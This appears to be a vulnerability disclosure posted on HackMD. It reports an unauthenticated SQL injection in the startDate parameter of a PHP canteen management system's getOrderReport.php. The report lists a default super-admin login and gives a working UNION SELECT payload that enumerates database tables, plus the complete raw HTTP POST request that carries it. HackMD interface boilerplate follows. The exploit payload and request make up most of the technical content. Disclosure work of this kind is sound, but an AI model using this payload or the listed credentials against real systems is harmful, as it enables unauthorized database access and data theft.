Discovered Day: 5/1/2023 Vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html
Login account: mayuri.infospace@gmail.com/rootadmin
(Super Admin account)
Vulnerability File: /php_action/getOrderReport.php
Vulnerability location: /php_action/getOrderReport.php, startDate
CVSS 3.0: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Payload: startDate=2023-01-05'+UNION+ALL+SELECT+4406,CONCAT(0x716a627a71,IFNULL(CAST(table_name+AS+NCHAR),0x20),0x716a6a7071),4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema+IN+(0x796f757468617070616d)--+-
POST /youthappam/php_action/getOrderReport.php HTTP/1.1
Host: localhost
Content-Length: 297
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="104"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://localhost/youthappam/report.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
startDate=2023-01-05'+UNION+ALL+SELECT+4406,CONCAT(0x716a627a71,IFNULL(CAST(table_name+AS+NCHAR),0x20),0x716a6a7071),4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema+IN+(0x796f757468617070616d)--+-&endDate=2023-01-06
The request can be sent by an unauthenticated user, for that reason, the CVSS of this vulnerability is 9.8
The value of startDate
parameter was passed to the SQL query and executed without any sanitized.
or
or
By clicking below, you agree to our terms of service.
New to HackMD? Sign up
Syntax | Example | Reference | |
---|---|---|---|
# Header | Header | 基本排版 | |
- Unordered List |
|
||
1. Ordered List |
|
||
- [ ] Todo List |
|
||
> Blockquote | Blockquote |
||
**Bold font** | Bold font | ||
*Italics font* | Italics font | ||
~~Strikethrough~~ | |||
19^th^ | 19th | ||
H~2~O | H2O | ||
++Inserted text++ | Inserted text | ||
==Marked text== | Marked text | ||
[link text](https:// "title") | Link | ||
![image alt](https:// "title") | Image | ||
`Code` | Code |
在筆記中貼入程式碼 | |
```javascript var i = 0; ``` |
|
||
:smile: | ![]() |
Emoji list | |
{%youtube youtube_id %} | Externals | ||
$L^aT_eX$ | LaTeX | ||
:::info This is a alert area. ::: |
This is a alert area. |
On a scale of 0-10, how likely is it that you would recommend HackMD to your friends, family or business associates?
Please give us some advice and help us improve HackMD.
Syncing